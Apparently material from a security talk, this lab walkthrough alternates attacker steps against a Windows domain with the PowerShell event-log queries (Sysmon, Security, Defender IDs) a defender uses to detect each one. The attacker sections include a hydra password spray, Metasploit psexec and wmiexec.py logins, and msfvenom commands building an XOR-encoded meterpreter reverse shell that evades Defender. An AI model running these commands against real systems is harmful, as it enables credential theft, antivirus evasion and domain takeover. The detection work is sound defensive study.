Attacker launches password spray
Attacker
Password spray:
hydra -L users.txt -P seasons-2023.txt 192.168.37.237 smb -u
Defender
Count successful (4624) and failed (4625) logins:
Get-WinEvent -Path C:\labs\valkyrie-security-logons.evtx | Group-Object id -NoElement | sort count
Attacker uses sprayed credentials to attempt to log in via Metasplot’s psexec
Attacker
msfconsole msf6 > use exploit/windows/smb/psexec msf6 > set RHOSTS 192.168.37.237 msf6 > set SMBUser fgaeta msf6 > set SMBPass W1nter2023! msf6 > exploit
Defender
Service was created (before Defender killed it):
Get-WinEvent @{Path="C:\labs\valkyrie-system.evtx"; ID=7045}| fl
Command was executed (event 4688):
Get-WinEvent @{Path="C:\labs\valkyrie-security.evtx";id=4688}| Where {$_.Message -like "*powershell.exe -nop*"} | fl
Windows Defender Antivirus killed the connection:
Get-WinEvent @{Path="C:\labs\valkyrie-defender.evtx";id=1117} | Where {$_.Message -like "*powershell.exe -nop*"} | fl
Attacker logs in with wmiexec.py:
Attacker
wmiexec.py fgaeta:W1nter2023\!@192.168.37.237
Defender
Microsoft Defender Antivirus: zero logs.
Sysmon event 1 (and security event 4688) shows
WmiPrvSE.exe
launchingcmd.exe
and redirecting to theADMIN$
share:
Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";id=1} | Where {$_.Message -like "*ADMIN$*"} | fl
Attacker runs ‘whoami -all’:
Attacker
Defender
Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";} | Where {$_.Message -like "*whoami*"} | fl
Attacker creates plan.exe with msfvenom:
Attacker
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.37.203 LPORT=8080 -x notepad.exe -f exe > plan.exe
Attacker uploads
plan.exe
via wmiexex.py’slput
, tries to run it, and fails:Defender
Upload:
Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";id=11} | Where {$_.Message -like "*plan.exe*"} | fl
The command executed:
Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";id=1} | Where {$_.Message -like "*Image: C:\Users\fgaeta\plan.exe*"} | fl
Then Windows Defender killed it:
Get-WinEvent @{Path="C:\labs\valkyrie-defender.evtx";id=1116} | Where {$_.Message -like "*plan.exe*"} | fl | more
Attacker uses xor encoding and re-uploads plan.exe
Attacker
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.37.203 LPORT=8080 -i 10 -e x64/xor_dynamic -x notepad.exe -f exe > plan.exe
The key difference:
-e x64/xor_dynamic
Upload and execute:
Reverse meterpreter shell connects to Metasploit:
Defender
Upload/execution: same events as before.
Reverse shell connection to port 8080:
Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";id=3} | Where {$_.Message -like "*plan.exe*"} | fl
Attacker runs getsystem
Attacker
getsystem
fails, so the attacker enables RDPThe attacker then logs in via RDP and disables Windows Defender Antivirus:
Defender
Windows Defender Antivirus kills the
getsystem
command
Get-WinEvent @{Path="C:\labs\valkyrie-defender.evtx";id=1117} | fl | more
RDP is enabled:
Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";id=1} | Where {$_.Message -like "*remotedesktop*"} | fl
Get-WinEvent @{Path="C:\labs\valkyrie-system.evtx"; ID=7040}| Where {$_.Message -like "*remote*"} | fl
Attacker runs getsystem again
Attacker
getsystem
is successful, so attacker migrates the meterpreter DLL to another process and steals a domain admin tokenDefender
Process migration:
Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";id=8} | Where {$_.Message -like "*plan.exe*"} | fl
Nothing was logged during the token theft and impersonation of GALACTICA/Administrator.
Attacker becomes domain admin
Attacker
Attacker runs meterpreter’s
shell
command:Attacker creates a domain account:
Atracker uses
wmic
to add new account to the domain admin group:Defender
Account creation:
Get-WinEvent @{Path="\labs\pegasus-security.evtx"; id=4720} | fl
New domain admin:
Get-WinEvent @{Path="\labs\\pegasus-security.evtx"; id=4737} | fl
Attacker RDPs into domain controller and verifies they are a domain admin
Attacker
Final step: attacker clears the logs
Attacker
Defender
Get-WinEvent @{Path="C:\labs\valkyrie-security.evtx"; id=1102} | fl
https://github.com/eric-conrad/c2-talk